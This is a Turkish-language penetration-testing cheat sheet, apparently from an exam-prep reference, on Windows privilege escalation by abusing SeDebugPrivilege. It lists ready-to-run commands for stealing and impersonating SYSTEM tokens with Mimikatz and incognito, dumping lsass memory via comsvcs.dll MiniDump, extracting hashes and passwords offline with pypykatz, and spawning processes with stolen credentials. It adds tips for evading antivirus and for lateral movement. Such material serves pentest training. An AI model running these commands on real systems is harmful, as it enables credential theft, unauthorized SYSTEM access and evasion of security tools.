PrivEsc ✓ EXAM-SAFE orta

SeDebugPrivilege & Token Impersonation/Theft — incognito tarzi token caldirma

SeDebugPrivilege ile yuksek ayricalikli process'lere (lsass, SYSTEM servisleri) erisip token'larini caldirma, lsass dump alma ve mevcut SYSTEM token'ini impersonate ederek (incognito / Mimikatz token::elevate / RunasCs) yetki yukseltme yontemleri.

ÖN KOŞULLAR

whoami /priv ciktisinda SeDebugPrivilege = Enabled (cogunlukla yerel admin/servis hesaplari)
SYSTEM process'leri uzerinde okuma/handle acma yetkisi

┌──

Komutlar

cmd ✓ EXAM-SAFE user

whoami /priv | findstr /i "SeDebug"

SeDebugPrivilege'in Enabled olup olmadigini kontrol eder. HackTricks — Abusing Tokens (SeDebug)

mimikatz ✓ EXAM-SAFE user

privilege::debug

Mimikatz icinde SeDebugPrivilege'i etkinlestirir — lsass'a erisim ve token islemleri icin on adim. HackTricks — Mimikatz

mimikatz ✓ EXAM-SAFE user

token::elevate

Mevcut SYSTEM token'ini bulup impersonate eder; Mimikatz oturumunu SYSTEM'e yukseltir (incognito mantigi). HackTricks — Mimikatz (token::elevate)

mimikatz ✓ EXAM-SAFE admin

sekurlsa::logonpasswords

SeDebug ile lsass belleginden parola/hash/ticket cikarir (token sonrasi loot). HackTricks — Mimikatz (sekurlsa)

incognito ✓ EXAM-SAFE user

incognito.exe list_tokens -u

Meterpreter disi standalone incognito ile sistemde mevcut impersonation/primary token'lari kullaniciya gore listeler. HackTricks — Abusing Tokens (Incognito)

incognito ✓ EXAM-SAFE user

incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe

Listelenen SYSTEM token'ini impersonate ederek SYSTEM olarak cmd calistirir. HackTricks — Abusing Tokens (Incognito)

powershell ✓ EXAM-SAFE admin

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Windows\Temp\lsass.dmp full

SeDebug ile comsvcs.dll MiniDump (LOLBAS) kullanarak lsass bellegini diske dump eder; offline parse icin Kali'ye tasiyin. LOLBAS: comsvcs.dll (MiniDump)

pypykatz ✓ EXAM-SAFE

pypykatz lsa minidump lsass.dmp

Kali tarafinda lsass.dmp'yi offline parse ederek hash/parola/ticket cikarir (Mimikatz yerine). HackTricks — pypykatz

runascs ✓ EXAM-SAFE user

RunasCs.exe {{USER}} {{PASS}} cmd.exe

Elde edilen creds ile yeni bir logon token uretip process baslatir; token tabanli yetki gecisi icin yardimci arac. HackTricks — RunasCs

Ayricaligin Gucu

SeDebugPrivilege, koruma altindaki olmayan tum process’lere (lsass dahil) PROCESS_ALL_ACCESS handle acmaya izin verir. Bu sayede iki ana saldiri acilir: (1) yuksek ayricalikli bir process’in token’ini caldirip impersonate etmek, (2) lsass bellegini dump edip kimlik bilgilerini cikarmak. SeDebug genellikle yerel admin veya bazi servis hesaplarinda bulunur.

Tespit

whoami /priv → SeDebugPrivilege = Enabled. Cogu zaman zaten yuksek-orta haklara sahip bir baglamda olursunuz; amac SYSTEM’e gecmek ve/veya domain creds toplamaktir.

Token Theft / Impersonation

Mantik: SYSTEM olarak calisan bir process bul, token’ini ac, duplicate et ve o token ile yeni process baslat.

Mimikatz — privilege::debug sonrasi token::elevate ile Mimikatz oturumu SYSTEM’e cikar. Ardindan token::list / token::run ile spesifik kullanici token’lari kullanilabilir.
Incognito (standalone veya Meterpreter load incognito) — list_tokens -u ile musait token’lari listeleyip impersonate_token "NT AUTHORITY\\SYSTEM" veya execute -c ile SYSTEM process baslatir. Domain ortamında bir admin oturum acmissa onun token’i da calinabilir (lateral movement).

lsass Dump → Offline Parse

SeDebug ile comsvcs.dll MiniDump (LOLBAS) en temiz on-disk yontemdir; ureyen lsass.dmp Kali’ye tasinip pypykatz ile parse edilir. Bu, Mimikatz’in hedefte calistirilmasini gerektirmedigi icin AV acisindan daha sessizdir. Alternatif: Task Manager / procdump.

Creds ile Token Uretme

Dump’tan parola/hash cikinca, RunasCs ile yeni logon token uretip process baslatabilirsiniz; pass-the-hash icin evil-winrm/impacket’e gecin (win-stored-creds, help-impacket).

Notlar

lsass PPL (Protected Process Light) ile korunuyorsa standart handle acma basarisiz olur; PPL bypass ek adim gerektirir [UNVERIFIED — ortam bagimli].
Mimikatz hedefte AV’ye takilirsa: lsass’i dump et + offline pypykatz; ya da .NET SafetyKatz/Out-Minidump varyantlari.
Token theft cikti teyidi: yeni shell’de whoami → nt authority\system veya hedef kullanici.

┌──

Kaynaklar

↗ HackTricks — Abusing Tokens (SeDebug / Incognito)↗ HackTricks — Mimikatz ↗ LOLBAS — comsvcs.dll (MiniDump)↗ GitHub — pypykatz (skelsec)↗ GitHub — RunasCs (antonioCoco)